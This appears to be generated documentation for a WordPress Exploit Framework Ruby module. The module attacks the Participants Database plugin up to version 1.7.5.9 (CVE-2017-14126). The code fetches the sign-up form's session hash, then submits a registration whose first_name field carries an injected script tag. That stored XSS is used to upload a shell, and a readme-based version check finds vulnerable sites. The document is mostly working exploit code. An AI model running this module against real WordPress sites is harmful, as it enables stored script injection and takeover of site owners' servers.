class Wpxf::Exploit::ParticipantsDatabaseV1759XssShellUpload

Attributes

session_hash[RW]

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 6
# Sets up module metadata and declares the single option the module needs.
#
# The superclass initialiser (Wpxf::WordPress::StoredXss::new, per the page
# header) runs first; then the name, authors, references and disclosure
# date are recorded via update_info, and the required `sign_up_path`
# string option is registered (it is read later by sign_up_url).
def initialize
  super

  authors = [
    'Benjamin Lim', # Vulnerability discovery
    'rastating'     # WPXF module
  ]
  references = [
    ['CVE', '2017-14126'],
    ['WPVDB', '8896']
  ]

  update_info(
    name: 'Participants Database <= 1.7.5.9 XSS Shell Upload',
    author: authors,
    references: references,
    date: 'Sep 06 2017'
  )

  # Relative path of the plugin's sign-up page; mandatory because every
  # request this module makes is built from it.
  sign_up_option = StringOption.new(
    name: 'sign_up_path',
    desc: 'The relative path of the Participants Database sign up page',
    required: true
  )
  register_options([sign_up_option])
end

Public Instance Methods

before_store()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 48
# Hook that runs before the stored payload is submitted.
#
# Caches the sign-up form's session hash / nonce on the instance via the
# session_hash accessor. Returns true when a value was obtained; otherwise
# reports the failure through emit_error and returns false so the caller
# can stop.
def before_store
  self.session_hash = fetch_nonce
  return true unless session_hash.nil?

  emit_error 'Failed to retrieve session hash / nonce'
  false
end
check()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 31
# Version check based on the plugin readme for the `participants-database`
# slug. The comparison value is 1.7.5.10, the release immediately after the
# affected range named in the module title; the helper presumably treats
# readme versions below it as affected — confirm against the base class.
def check
  fixed_version = '1.7.5.10'
  check_plugin_version_from_readme('participants-database', fixed_version)
end
fetch_nonce()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 43
# Fetches the sign-up page and extracts the hidden `session_hash` input.
#
# @return [String, nil] the captured value when the GET request succeeds
#   with HTTP 200 and the hidden field is present; nil when the request
#   fails, the status is not 200, or the pattern does not match.
def fetch_nonce
  res = execute_get_request(url: sign_up_url)
  return nil unless res && res.code == 200

  # Case-insensitive match; only capture group 1 (the value) is returned.
  res.body[/name="session_hash"\s+type="hidden"\s+value="([a-z0-9]+)"/i, 1]
end
sign_up_url()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 39
# Absolute URL of the sign-up page: the target's full_uri joined with the
# user-supplied `sign_up_path` option via normalize_uri.
def sign_up_url
  relative_path = datastore['sign_up_path']
  normalize_uri(full_uri, relative_path)
end
store_script()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 59
# Submits the sign-up form with the XSS include script placed in the
# `first_name` field; the remaining fields are filled with fixed values
# and random names / e-mail so the submission is accepted as a new entry.
#
# Form keys are reproduced byte-for-byte from the original module
# (including the 'shortcode_page=' key). Evaluation order is kept: the URL
# is resolved first, then the fields in the order listed.
#
# @return whatever execute_post_request returns for the POST.
def store_script
  target = sign_up_url
  page = datastore['sign_up_path']
  text = Wpxf::Utility::Text

  form_fields = {
    'action' => 'signup',
    'subsource' => 'participants-database',
    'shortcode_page=' => page,
    'thanks_page' => page,
    'instance_index' => '2',
    'pdb_data_keys' => '1.2.9.10',
    'session_hash' => session_hash,
    'first_name' => "<script>#{xss_include_script}</script>#{text.rand_alpha(6)}",
    'last_name' => text.rand_alpha(6),
    'email' => text.rand_email,
    'mailing_list' => 'No',
    'submit_button' => 'Submit'
  }

  execute_post_request(url: target, body: form_fields)
end
vulnerable_page()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 35
# Human-readable description of where the stored payload is rendered.
#
# @return [String] a fixed description string.
def vulnerable_page
  %q(the page containing the participant list)
end